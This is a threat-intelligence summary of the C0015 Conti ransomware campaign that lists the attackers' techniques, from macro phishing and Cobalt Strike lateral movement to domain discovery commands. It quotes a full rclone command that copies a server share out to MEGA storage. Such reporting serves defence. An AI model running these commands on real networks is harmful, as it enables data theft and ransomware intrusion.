During C0015, the threat actors used cmd.exe to execute commands and run malicious binaries. They also employed a malicious HTA file containing a mixture of HTML and JavaScript/VBScript code, with portions of the HTML being encoded.

Moreover, they utilized Conti ransomware to encrypt the compromised network and collected files from network shared drives prior to encryption. The stolen files and data were then exfiltrated from the network.

PowerView’s file share enumeration results were stored in c:\ProgramData\found_shares.txt. To further control the exfiltration process, the threat actors limited Rclone’s bandwidth setting.

In addition, they used the command nltest /domain_trusts /all_trusts to enumerate domain trusts and exfiltrated sensitive data to the MEGA cloud storage site using the following Rclone command:
rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M  

They conducted file listing discovery across multiple hosts to ensure that the locker encryption was successful and downloaded additional tools and files onto the compromised network.

For lateral movement, the attackers used WMI to load Cobalt Strike onto other hosts. One binary was named compareForfor.jpg to masquerade as a JPG file, and PowerView's ShareFinder module was executed to identify open shares. They also employed Base64-encoded strings throughout the operation.

The actors leveraged both Cobalt Strike and Conti ransomware and obtained various tools, including AdFind, AnyDesk, and Process Hacker.

To escalate privileges, they used the command net localgroup "administrator" to identify accounts with local administrator rights and net group "domain admins" /dom to enumerate domain groups.

According to security researchers, the attack likely began with a phishing campaign that delivered a weaponized attachment to victims.

They used the tasklist /s command and Task Manager to gather information on running processes. A DLL named D8B3.dll was injected into the Winlogon process, and the AnyDesk remote desktop application was installed on the compromised network.

The threat actors accessed specific network hosts using RDP. For host discovery, they ran net view /all /domain and ping, and additionally used PowerView’s PowerShell Invoke-ShareFinder script for file share enumeration.

They utilized DLL files with invalid certificates, executed DLLs via mshta, employed code that used regsvr32 for execution, and loaded DLLs via rundll32 using the svchost process.

They also executed code to obtain the external public-facing IPv4 address of the compromised host and used the command net view /all time to gather the local time.

To gain initial access or execute payloads, they relied on users enabling macros within malicious Microsoft Word documents. Furthermore, they used wmic and rundll32 to load Cobalt Strike onto a target host.